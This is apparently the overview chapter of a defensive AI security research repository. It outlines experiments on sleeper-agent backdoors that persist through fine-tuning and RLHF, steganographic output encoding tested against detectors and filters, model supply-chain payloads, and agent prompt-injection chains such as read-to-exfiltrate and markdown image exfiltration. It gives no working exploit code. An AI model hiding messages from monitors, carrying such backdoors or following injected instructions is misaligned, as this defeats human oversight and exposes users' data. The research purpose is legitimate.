Attack Lab
Proof-of-concept exploit code and experiments validating the threat analysis. Defensive research only.
Purpose
This chapter presents proof-of-concept experiments that validate (or challenge) the claims made in the research analysis. The goal is to move from “the literature says X is possible” to “here is X working on a toy model with measurable results.”
Experiment source code lives in 04-code-lab/attack-lab/. This directory contains the narrative chapter that presents and interprets the results.
Ethics and Legality
All code in this directory is for defensive security research and education only.
- Experiments use small/toy models (not frontier models)
- No code is designed to attack production systems or real users
- Exploit demonstrations are contained and self-targeting
- Results are intended for peer-reviewed publication
- This work follows responsible disclosure principles
Experiment Areas
backdoor-injection/
Train small models with deliberate backdoors (sleeper-agent style). Measure:
- Backdoor activation rate with and without trigger
- Persistence through fine-tuning, RLHF, and quantization
- Detection rates using available tools (Neural Cleanse, STRIP, etc.)
steganography/
Implement and test output encoding schemes. Measure:
- Bits-per-token encoding capacity
- Detectability via statistical analysis
- Bandwidth vs. detectability tradeoff curve
- Effectiveness of output filters against various encoding schemes
supply-chain/
Demonstrate non-weight attack vectors. Build:
- Malicious pickle file with benign model behavior + payload
- Tokenizer vocabulary manipulation (silent token remapping)
- Config JSON auto_map hijacking
- GGUF metadata injection
prompt-injection/
Build tool-using agent harnesses and test attack chains:
- Indirect prompt injection via retrieved documents
- Tool-chain exploitation (read -> exfiltrate)
- Confused deputy attacks with authorized tools
- Markdown image exfiltration
detection/
Evaluate existing detection tools against our injected backdoors:
- Neural Cleanse (adapted for small transformer models)
- STRIP (entropy analysis under perturbation)
- Activation clustering
- Statistical output analysis for steganography detection
- Compare detection rates across backdoor sophistication levels
shared/
Common code used across experiments:
- Model training and loading utilities
- Evaluation harnesses
- Statistical analysis tools
- Results logging and visualization
Setup
cd 04-code-lab
bash setup.sh attack-lab # creates .venv-attack-lab and installs deps
source .venv-attack-lab/bin/activate # Linux/macOS
# or: .venv-attack-lab\Scripts\activate # Windows
See 04-code-lab/requirements/attack-lab.txt for the full dependency list.
Requirements
- Python 3.10+
- PyTorch >= 2.0
- Transformers >= 4.36 (Hugging Face)
- See
04-code-lab/requirements/attack-lab.txtfor complete list - Additional per-experiment dependencies documented in each subdirectory README
Each experiment subdirectory will contain its own README with specific setup, methodology, expected results, and what it proves or disproves from the research analysis.